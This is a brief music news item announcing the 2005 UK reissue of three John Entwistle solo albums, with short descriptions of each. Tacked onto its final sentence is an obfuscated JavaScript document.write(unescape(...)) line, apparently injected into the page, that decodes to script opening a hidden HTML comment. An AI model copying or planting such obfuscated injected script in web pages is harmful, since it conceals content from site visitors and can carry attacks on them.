December 12th 2005 is red letter day for fans of one of the most influential bass players in rock music. Castle Music will release a trio of John Entwistle albums - Mad Dog (originally released in 1975), Too Late The Hero
(originally released in 1981) and The Rock (never before released domestically in the UK). All albums will be released with bonus tracks, demos and rarities.
Before Entwistle came along as a member of the Who, bassists seldom stood out for their playing and few casual listeners knew or cared what purpose the four-stringed instrument served - after he came along, everyone knew.
Mad Dog - After three solo releases in a span of three years, Who bassist John
Entwistle decided to form his own 'band' for his fourth non-Who release, Mad Dog. Credited to John Enwistle's Ox, the band greatly expanded to include horns, keyboards, and strings to the usual rock band set-up (bass, vocals, guitar, drums). Originally released on Decca in 1975, the album was recorded during the filming of The Who's Tommy film and the recording of its soundtrack. This was the last album to be produced by the legendary John Alcock
Too Late The Hero - Who bassist's 1981 solo album featuring drummer Joe Vitale & the signature guitar work of Joe Walsh all over the album. The album's nine tracks focus on themes of love, disco and passion. Includes, 'Dancing Master', 'Fallen Angel', 'Talk Dirty' & 'Too Late The Hero'.
The Rock - Billed as the 'lost' Entwistle album, although recorded in 1986 it saw US release in 1996 but was never released domestically in the UK. Featuring Zak Starkey on drums, this is a must have purchase for all fans.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
